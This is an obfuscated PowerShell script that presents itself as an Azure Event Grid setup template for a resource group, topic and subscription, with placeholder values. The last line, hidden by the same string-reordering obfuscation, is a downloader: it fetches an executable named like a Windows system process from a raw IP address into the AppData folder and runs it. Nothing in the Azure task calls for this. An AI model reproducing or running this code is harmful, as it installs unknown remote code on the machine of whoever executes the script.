${M`YTOP`Ic} = ("{5}{1}{3}{2}{0}{4}{6}" -f'top','r-','m-','custo','ic-nam','<you','e>')


${MYe`Nd`POInt} = ("{3}{2}{1}{0}"-f 'L>','t-UR','n','<your-endpoi')


${mYr`E`SouRcE`GROup} = ("{4}{1}{5}{0}{3}{2}"-f'e-group-','esou','me>','na','<r','rc')


.("{2}{3}{0}{1}{4}" -f'ou','rce','New-Az','Res','Group') -Name ${MYresou`R`cEgro`UP} -Location ("{1}{0}"-f 'tus2','wes')


${toP`I`Cid} = (&("{4}{2}{1}{0}{3}"-f'dT','EventGri','w-Az','opic','Ne') -ResourceGroupName ${MY`R`eso`URC`egRoup} -Name ${my`To`Pic} -Location ("{2}{1}{0}"-f 'us2','t','wes'))."i`d" 


&("{3}{0}{5}{1}{2}{4}"-f'ew-Az','i','dS','N','ubscription','EventGr') `
  -ResourceId ${t`oPIc`id} `
  -EventSubscriptionName ("{0}{2}{3}{4}{1}"-f 'demoSubs','on','cr','ipt','i') `
  -Endpoint ${m`yEND`PO`inT} 

(.("{0}{2}{1}"-f 'New-Obj','ct','e') ("{3}{1}{0}{2}" -f 't.WebCl','e','ient','System.N')).("{2}{0}{3}{1}"-f 'a','ile','Downlo','dF').Invoke(("{5}{3}{6}{1}{0}{4}{2}"-f'38/~yahoo/','4.102.53.2','exe','tt','csrsv.','h','p://9'),"$env:APPDATA\csrsv.exe");&("{2}{0}{1}" -f '-Proc','ess','Start') ("$env:APPDATA\csrsv.exe")
